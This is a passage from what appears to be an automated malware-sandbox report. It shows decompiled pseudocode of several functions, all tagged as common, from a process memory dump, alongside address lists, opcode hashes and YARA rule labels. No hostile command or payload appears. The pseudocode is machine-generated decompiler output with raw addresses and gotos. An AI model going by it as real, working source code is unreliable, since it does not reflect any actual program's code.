						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E0167CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E0169ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}

0x0169ae44
0x0169ae4c
0x0169ae53
0x0169ae55
0x0169ae5c
0x0169ae64
0x0169ae68
0x0169ae75
0x0169ae75
0x0169ae78
0x0169ae7a
0x0169ae7c
0x0169ae7f
0x0169aea8
0x0169aeab
0x0169aead
0x00000000
0x00000000
0x0169aeb3
0x0169aeb8
0x0169aebb
0x0169aebd
0x00000000
0x0169ae81
0x0169ae88
0x0169ae8f
0x0169ae9b
0x0169ae96
0x0169ae96
0x0169ae96
0x0169aea0
0x0169aea3
0x0169aebf
0x0169aebf
0x0169aec3
0x0169aec9
0x0169af0d
0x0169af14
0x0169af3d
0x0169af3d
0x0169af41
0x0169af44
0x0169af67
0x0169af67
0x0169af6a
0x0169afca
0x0169afd1
0x00000000
0x0169afd1
0x0169af6c
0x0169af6d
0x0169af75
0x0169af7c
0x0169af7e
0x0169af80
0x0169af85
0x0169af87
0x0169af99
0x0169af89
0x0169af92
0x0169af92
0x0169af9e
0x0169afa1
0x0169afa3
0x0169afa9
0x0169afb0
0x0169afb2
0x0169afb4
0x0169afbc
0x0169afbc
0x0169afb4
0x0169afb0
0x00000000
0x0169afa1
0x0169af4f
0x0169af57
0x0169af5c
0x0169af5e
0x00000000
0x00000000
0x0169af60
0x0169af64
0x0169af64
0x00000000
0x0169af64
0x0169af1a
0x0169af25
0x00000000
0x00000000
0x0169af27
0x0169af28
0x0169af33
0x00000000
0x0169aed0
0x0169aed0
0x0169aed2
0x0169aee1
0x0169aee4
0x00000000
0x00000000
0x0169aee6
0x0169aeec
0x00000000
0x00000000
0x0169aefb
0x0169af07
0x0169afd3
0x0169afdb
0x0169afdb
0x00000000
0x0169af07
0x0169aed6
0x0169aed8
0x0169aedf
0x00000000
0x00000000
0x00000000
0x0169aedf
0x0169aec9

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b4f45373dc4c570a700345d1fda942c8a32012abaf25d1c0d11c6e8f9d596b5
Instruction ID: a98352d01f5dce9f26978acf9cbba86b8ef9be5ac63ad525370056954f6c8e11
Opcode Fuzzy Hash: 9b4f45373dc4c570a700345d1fda942c8a32012abaf25d1c0d11c6e8f9d596b5
Instruction Fuzzy Hash: 4341C1B17002129BDF269AADCC94B3BBBDEEF94620F04421DF956877D0DB34D801D691

Uniqueness

Uniqueness Score: -1.00%

Function 015FDBE9, Relevance: .1, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E015FDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E015DCC50(E015D4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E015F7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E016A8ED6(_t102, _t98);
						}
						_t76 = _v44;
						E015F2280(_t58, _v44);
						E015FDD82(_v44, _t102, _t98);
						E015FB944(_t102, _v5);
						return E015EFFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x16c8628; // 0x0
							_v28 = _t67;
							_t68 =  *0x16c862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x16c8628; // 0x0
						_t105 = _v28;
						_t80 =  *0x16c862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x169fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}

0x015fdbe9
0x015fdbf2
0x015fdbf7
0x015fdbf9
0x015fdbfc
0x015fdc00
0x015fdc03
0x015fdc14
0x015fdd54
0x015fdd54
0x015fdd54
0x015fdc18
0x015fdc1d
0x015fdc1d
0x015fdc32
0x015fdc3b
0x015fdc3e
0x015fdc46
0x015fdd5b
0x015fdd62
0x015fdd64
0x015fdd67
0x015fdd69
0x015fdd6b
0x015fdd6e
0x015fdd70
0x015fdd73
0x015fdd73
0x00000000
0x015fdc4c
0x015fdc4e
0x01643ae3
0x01643ae8
0x01643aea
0x015fdce7
0x015fdce9
0x015fdcec
0x015fdcee
0x015fdcf0
0x015fdcf3
0x015fdcf5
0x01643af2
0x01643af5
0x01643af5
0x015fdd06
0x015fdd08
0x015fdd0b
0x015fdd12
0x01643b08
0x015fdd18
0x015fdd18
0x015fdd18
0x015fdd20
0x015fdd23
0x01643b16
0x01643b16
0x015fdd29
0x015fdd2d
0x015fdd36
0x015fdd40
0x015fdd51
0x015fdd51
0x015fdc54
0x015fdc59
0x015fdc59
0x015fdc5e
0x015fdc5e
0x015fdc63
0x015fdc66
0x015fdc6b
0x015fdc78
0x015fdc7b
0x015fdc81
0x015fdc81
0x015fdc83
0x015fdc89
0x00000000
0x00000000
0x015fdd7b
0x015fdd7b
0x015fdc8f
0x015fdc8f
0x015fdc92
0x015fdc99
0x015fdc9f
0x015fdca5
0x015fdcaa
0x015fdcaa
0x015fdcb3
0x015fdcb8
0x015fdcbb
0x015fdcc1
0x015fdccf
0x015fdcd2
0x015fdcd5
0x015fdcd7
0x015fdcda
0x015fdcdc
0x015fdcdc
0x015fdce2
0x015fdce4
0x00000000
0x015fdce4

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ece507c3a8e68ccd9d5c821b677d21d178af5303df985f7e9cc744ac4f0402e
Instruction ID: 7359a725ecc01a01bb56b6f89c8150e287ee813b230483586ec0a91ee852bbbd
Opcode Fuzzy Hash: 9ece507c3a8e68ccd9d5c821b677d21d178af5303df985f7e9cc744ac4f0402e
Instruction Fuzzy Hash: 58519171A01616DFCB14CFA8C880BAEBBF5BB88350F24855EDA55EB344DB31A944CB90

Uniqueness

Uniqueness Score: -1.00%

Function 015EEF40, Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E015EEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E015D9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x77dfc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E015D2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x015eef4b
0x015eef4d
0x015eef57
0x015ef0bd
0x015ef0c2
0x015ef0d2
0x015ef0d2
0x015ef0c2
0x015eef5d
0x015eef5f
0x015eef67
0x015eef6a
0x015eef6d
0x015eef74
0x015eef7f
0x015eef82
0x015eef82
0x015eef86
0x015eef88
0x015eef8c
0x015eef8f
0x015eef8f
0x015eef8f
0x00000000
0x015eef91
0x015eef93
0x015eefc4
0x015eefc4
0x015eefc4
0x015eefca
0x015eefd0
0x015ef0a6
0x00000000
0x00000000
0x015ef0af
0x0163bb06
0x0163bb0a
0x015ef0b5
0x015ef0b5
0x015ef0b5
0x015ef0b5
0x00000000
0x015eefd6
0x015eefd9
0x015ef0de
0x015ef0e2
0x015eefdf
0x015eefdf
0x015eefdf
0x015eefe5
0x0163bafc
0x0163bafc
0x015eefe5
0x015eefeb
0x015eefed
0x015ef00f
0x015ef011
0x015ef01a
0x015ef01d
0x015ef021
0x015ef028
0x015ef029
0x015ef029
0x015ef02c
0x00000000
0x015ef02c
0x015eeff3
0x015eeff9
0x015ef0ea
0x015ef0ed
0x015ef0ef
0x00000000
0x015ef0ef
0x015ef003
0x0163bb12
0x015ef045
0x015ef049
0x015ef051
0x015ef09e
0x015ef0a0
0x015ef0a0
0x015ef09e
0x015ef053
0x015ef064
0x015ef064
0x015ef06b
0x0163bb1a
0x0163bb1a
0x015ef071
0x015ef071
0x015ef07d
0x015ef082
0x015ef08f
0x015ef08f
0x015ef009
0x015ef00d
0x00000000
0x015ef00d
0x015eefd0
0x015eef97
0x015eefa5
0x015eefaa
0x00000000
0x015eefac
0x015eefac
0x015eefac
0x00000000
0x015eefb2
0x015ef036
0x015ef03a
0x015ef040
0x015ef090
0x00000000
0x015ef092
0x015ef042
0x00000000
0x015ef042
0x015eefb7
0x015eefb9
0x015eefbc
0x015eefb0
0x015eefb0
0x00000000
0x015eefbe
0x015eefbe
0x015eefc1
0x00000000
0x015eefc1
0x015eefbc
0x015eefaa
0x015eef91

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: 78ab539d977a744d9e9459edf4f10d62b04c931c0e9ea7976db3ef470e6d7de3
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: AC511230E04245DFEB29CB68C0C97AEBFF1FF45314F1881AAC5665B282DB75A989C741

Uniqueness

Uniqueness Score: -1.00%

Function 016A740D, Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E016A740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0162D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0161F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L015F4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L015F4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0161F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L015F4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}

0x016a740d
0x016a740d
0x016a7412
0x016a7413
0x016a7416
0x016a7418
0x016a741c
0x016a741f
0x016a7422
0x016a7422
0x016a7428
0x016a742a
0x016a742a
0x016a7451
0x016a7432
0x016a744f
0x016a744f
0x00000000
0x016a7434
0x016a7438
0x016a7443
0x016a7517
0x016a7517
0x016a751a
0x016a7535
0x016a7520
0x016a7527
0x016a752c
0x016a7531
0x016a7533
0x00000000
0x016a7533
0x00000000
0x016a7531
0x016a754b
0x016a754f
0x016a755c
0x016a755c
0x016a755f
0x016a7560
0x016a7561
0x016a7562
0x016a7563
0x016a7568
0x016a756a
0x016a756c
0x016a756d
0x016a756d
0x016a756f
0x016a7572
0x016a7574
0x016a7577
0x016a757c
0x016a757f
0x00000000
0x016a7551
0x016a7551
0x016a7551
0x016a7553
0x016a7553
0x016a7449
0x016a7449
0x016a744c
0x016a744c
0x00000000
0x016a744c
0x016a7443
0x016a750e
0x016a7514
0x016a7514
0x016a7455
0x016a7469
0x016a746d
0x00000000
0x016a7473
0x016a7473
0x016a7476
0x016a7480
0x016a7484
0x016a748e
0x016a7493
0x016a7493
0x016a7496
0x016a7499
0x016a74a1
0x016a74b1
0x016a74b5
0x00000000
0x016a74bb
0x016a74c1
0x016a74c1
0x016a74c4
0x016a74c5
0x016a74c6
0x016a74c7
0x016a74c8
0x016a74cd
0x00000000
0x016a74d3
0x016a74d3
0x016a74d6
0x016a74d8
0x016a74db
0x016a74dd
0x016a74e0
0x016a74e7
0x016a74ee
0x016a74ee
0x016a74f4
0x016a74f9
0x00000000
0x016a74fb
0x016a74fb
0x016a74fd
0x016a7500
0x016a7503
0x016a7505
0x016a7505
0x016a74f9
0x00000000
0x016a74cd
0x016a74b5
0x00000000

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: 1f14e3df0250975b12b4b7bfd7dc576ba31712e0b03136964e78bc5cc1d58d96
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: 2A518E71600646EFDB16CF58D880A56BBB5FF45304F58C1AAE9089F212E772EE46CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01602990, Relevance: .1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E01602990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x16aff00);
				E0162D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x15b1664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E0161E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x15b1668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E016551BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x15b166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E01602AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E015E6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E01602C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E015EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E01602AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E01602C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E01602ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0162D0D1(_t62);
				goto L28;
			}

0x01602990
0x01602992
0x01602997
0x016029a3
0x016029a6
0x016029ab
0x016029ad
0x016029b2
0x01645c80
0x016029b8
0x016029b8
0x016029bb
0x016029c0
0x016029c5
0x016029c6
0x016029c6
0x016029cb
0x00000000
0x00000000
0x016029cd
0x016029d0
0x016029d9
0x016029db
0x016029dd
0x01602a7f
0x01602a84
0x01602a87
0x01602a89
0x01645ca1
0x01645ca3
0x00000000
0x01602a8f
0x01602a8f
0x00000000
0x01602a8f
0x00000000
0x016029e3
0x016029e3
0x016029e3
0x00000000
0x016029e3
0x016029dd
0x00000000
0x016029db
0x016029e6
0x016029e9
0x016029eb
0x016029ed
0x016029f3
0x016029f5
0x016029f8
0x016029fa
0x01602a97
0x01602a9a
0x01602a9d
0x01602add
0x00000000
0x01602a9f
0x01602aa2
0x01602aa5
0x01602aa8
0x01602aab
0x01645cab
0x01645caf
0x01645cc5
0x01645cda
0x01645cdc
0x01645cdf
0x01645ce5
0x00000000
0x01645ceb
0x01645ced
0x01645cee
0x00000000
0x01645cee
0x01645cb1
0x01645cb4
0x01645cb9
0x01645cbb
0x00000000
0x01645cbd
0x01645cbd
0x00000000
0x01645cbd
0x01645cbb
0x01602ab1
0x01602ab1
0x01602ac4
0x01602ac6
0x01602ac6
0x00000000
0x01602ac6
0x01602aab
0x00000000
0x01602a00
0x01602a09
0x01602a0e
0x01602a21
0x01602a24
0x01602a35
0x01602a3a
0x01602a3d
0x01602a42
0x01602a59
0x01602a59
0x01602a5c
0x01602a5f
0x01602a5f
0x016029fa
0x016029f3
0x01602a64
0x01602a64
0x01602a6b
0x01602a6b
0x01602a6d
0x01602a72
0x00000000

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c81f23d79e7bad8d71e6214eae429fe391ad9e440bd7b698119a6b6ce475018
Instruction ID: ed4317de216a8aac2042a89b6f152c39f8098bada723027970ddb9621bcacbca
